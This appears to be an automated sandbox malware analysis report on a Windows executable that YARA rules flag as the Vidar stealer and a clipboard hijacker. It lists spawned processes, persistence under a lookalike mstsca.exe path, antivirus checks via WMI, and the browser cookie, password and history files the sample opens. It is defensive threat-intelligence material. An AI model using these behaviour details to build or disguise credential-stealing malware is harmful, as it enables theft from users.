Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process created: C:\Users\user\Desktop\UXNob1Dp32.exe "C:\Users\user\Desktop\UXNob1Dp32.exe"	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process created: C:\Users\user\Desktop\UXNob1Dp32.exe "C:\Users\user\Desktop\UXNob1Dp32.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process created: C:\Users\user\Desktop\UXNob1Dp32.exe "C:\Users\user\Desktop\UXNob1Dp32.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Process created: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe --Task	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process created: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe "C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe"	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process created: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe "C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Process created: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe "C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe"
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Process created: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe "C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe" --AutoStart
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe	Process created: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe "C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Process created: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe "C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe" --AutoStart
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Code function: 0_2_05E580F6 cpuid

0_2_05E580F6

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_05E70AB6
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	1_2_00438178
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	1_2_00440116
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,	1_2_004382A2
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	1_2_0043834F
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	1_2_00438423
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: EnumSystemLocalesW,	1_2_004387C8
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: GetLocaleInfoW,	1_2_0043884E
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,	1_2_00437BB3
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: EnumSystemLocalesW,	1_2_00437E27
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	1_2_00437E83
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	1_2_00437F00
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	1_2_00437F83
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	3_2_05E90AB6
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	4_2_05E00AB6

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Code function: 0_2_00408AF4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00408AF4

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

1_2_00419F90

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Code function: 1_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

1_2_0042FE47

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

1_2_00419F90

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Clipboard Hijacker

Source: Yara match	File source: 14.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.build3.exe.8115a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.mstsca.exe.9315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.mstsca.exe.23115a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.build3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000002.3619043820.0000000000930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4080039509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2386525416.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1879406390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.3032277609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2385413925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.3032732772.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1981619549.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1870730144.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.3618417381.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar stealer

Source: Yara match	File source: 9.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.build2.exe.35a15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.build2.exe.35a15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1752904498.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1934156488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: build2.exe PID: 7380, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build2.exe PID: 7396, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ExperimentStoreData.json	Jump to behavior
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\shield-preference-experiments.json	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\handlers.json	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\Telemetry.FailedProfileLocks.txt	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\addonStartup.json.lz4	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\addons.json	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\targeting.snapshot.json	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\z6bny8rn.default\times.json	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Google Profile.ico	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\pkcs11.txt	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\search.json.mozlz4	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db-journal	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\LOG.old	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\containers.json	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\AlternateServices.txt	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\extension-preferences.json	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\parent.lock	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore.jsonlz4	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\SiteSecurityServiceState.txt	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\trusted_vault.pb	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionCheckpoints.json	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\xulstore.json	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\times.json	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior

Yara detected Credential Stealer

Source: Yara match

File source: Process Memory Space: build2.exe PID: 7396, type: MEMORYSTR

Remote Access Functionality

Yara detected Vidar stealer

Source: Yara match	File source: 9.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.build2.exe.35a15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.build2.exe.35a15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1752904498.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1934156488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: build2.exe PID: 7380, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build2.exe PID: 7396, type: MEMORYSTR

Windows Analysis Report
UXNob1Dp32.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1430719
Product:	CloudBasic
Start time:	05:06:05
Start date:	24.04.2024
Sample:	UXNob1Dp32.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	c3804647168d439928c2ca4019d87609
SHA1:	ceb7a332a4ed40878a2c381fcf76fcd06528df65
SHA256:	651bf6dc2ce11fbbda045ac186ab58ac3d691f8d28dc811f2b1552fe74b275cc
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Windows Analysis Report UXNob1Dp32.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
UXNob1Dp32.exe

Malware Threat Intel
Provided by